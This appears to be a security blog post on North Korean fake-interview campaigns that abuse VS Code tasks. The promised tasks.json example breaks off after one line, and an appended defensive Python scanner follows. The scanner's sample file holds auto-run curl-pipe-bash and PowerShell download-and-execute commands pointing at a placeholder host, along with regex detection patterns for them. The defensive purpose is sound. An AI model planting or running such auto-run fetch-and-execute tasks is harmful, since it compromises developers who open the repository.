Recently, GitLab's Threat Intelligence team, part of the Security Operations team, published an extensive article revealing North Korean tradecraft and detailing ways in which GitLab has tracked and disrupted these malicious actors. Security Operations here also includes our Security Incident Response Team (SIRT), Security Logging, Signals Intelligence, and Red Team. This tight collaboration across security disciplines allows us to take tips from threat intelligence, emulate relevant threat actors via Red and Purple Team exercises, and proactively build detection and prevention techniques based on that activity.

So, in parallel with the discovery of the North Korean tradecraft and associated Contagious Interview threat campaign, we developed custom controls to prevent similar malware campaigns, specifically those which use IDE attacks. In this article, we share those controls as well as the techniques we use to protect our customers, support the broader security community, and further thwart these malicious actors.

The threat intelligence

The North Korean tradecraft article focused on a broad set of attacks, techniques, and Indicators of Compromise (IOCs) that North Korean state actors are actively using to conduct both broad and targeted attacks. One of the attack paths noted was the use of Visual Studio Code tasks for malware distribution. The Contagious Interview threat campaign often relies on fake interview processes to convince their victims to download and open a code repository, enabling attack via VS Code tasks.

VS Code tasks are a mechanism designed to automate common jobs that developers want to run when opening a repository, such as linting, building, packaging, testing, or deploying software systems. Via a simple configuration file within the repo, tasks.json, developers can automatically run code whenever they open their repository. Trust must be granted to the repository for these tasks to run.

Contagious Interview's pretexts often rely on malicious repositories, so pivoting to using VS Code tasks for code execution is a simple continuation of their pretext. The target is prompted to download and open the malicious repository in VS Code (often for code review purposes as part of an interview). Because the victims believe they are interviewing for a job, the victim is under heavy pressure to "trust" the interviewer's workspace, enabling the malicious task to run without their knowledge.

One example of a malicious tasks.json file is shown below. It is fairly simple — it detects the OS and downloads the next stage of the malware for that platform, using a curl | bash structure. Domains included are placeholders and not actual IOCs. Detailed IOCs for these actors were shared in our previous blog post.

"version": "1.0.8",
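A defender-side check for the pattern described above, added here as an example and not one of GitLab's own controls: it scans a repository's .vscode/tasks.json for tasks that auto-run on folder open (`runOptions.runOn == "folderOpen"`) and for download-and-execute commands, including per-platform `windows`/`linux`/`osx` overrides. The sample tasks.json is constructed for the example and the domain is a placeholder, not an IOC.

```python
import json
import re

# Constructed sample (placeholder domain, not a real IOC): one normal build task
# and one auto-run task that fetches and pipes a script to a shell, as the post describes.
SAMPLE_TASKS_JSON = r'''{
  // tasks.json is JSONC, so line comments like this one are legal
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -s https://placeholder.invalid/s.sh | bash",
      "windows": {"command": "powershell -c \"iwr https://placeholder.invalid/s.ps1 | iex\""},
      "runOptions": {"runOn": "folderOpen"}
    }
  ]
}'''

# Download-and-execute shapes worth flagging in any task command string.
SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    re.compile(r"\b(iwr|Invoke-WebRequest)\b.*\|\s*iex\b", re.IGNORECASE),
]

def load_tasks(text):
    """Parse tasks.json, stripping // line comments since VS Code accepts JSONC."""
    stripped = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
    return json.loads(stripped).get("tasks", [])

def task_commands(task):
    """Collect the task's command plus any per-platform override commands."""
    scopes = (task, task.get("windows", {}), task.get("linux", {}), task.get("osx", {}))
    return [s["command"] for s in scopes if isinstance(s.get("command"), str)]

def find_risky_tasks(text):
    """Return (label, reason) pairs for auto-run tasks and download-and-execute commands."""
    findings = []
    for task in load_tasks(text):
        label = task.get("label", "<unnamed>")
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append((label, "runs automatically on folderOpen"))
        for cmd in task_commands(task):
            if any(p.search(cmd) for p in SUSPICIOUS):
                findings.append((label, f"download-and-execute pattern: {cmd}"))
    return findings

if __name__ == "__main__":
    for label, reason in find_risky_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] task '{label}': {reason}")
```

Run it against each cloned repository before the workspace is trusted; a "folderOpen" finding alone is worth a manual look even when the command itself looks benign.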